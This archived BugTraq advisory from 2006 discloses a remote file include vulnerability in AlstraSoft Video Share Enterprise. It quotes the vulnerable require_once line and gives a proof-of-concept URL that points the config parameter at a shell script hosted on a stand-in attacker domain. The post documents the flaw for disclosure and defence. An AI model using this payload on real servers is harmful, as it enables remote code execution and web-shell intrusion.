BugTraq
AlstraSoft Video Share Enterprise Remote File Include Vulnerability Aug 26 2006 09:48AM
night_warrior- hotmail com
##Night_Warrior<Kurdish Hacker>

##night_warrior-[at]hotmail.com

##AlstraSoft Video Share Enterprise Remote File Include Vulnerability

##Contact : night_warrior-[at]hotmail.com

##hompage : www.alstrasoft.com

##vuln code :

myajaxphp.php line 11

require_once($config['BASE_DIR'] . "/ajax/cpaint2.inc.php");

http://www.example.com/[Script Path]/ajax/myajaxphp.php?config[BASE_DIR]=http://atacker.com/shell.txt?

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus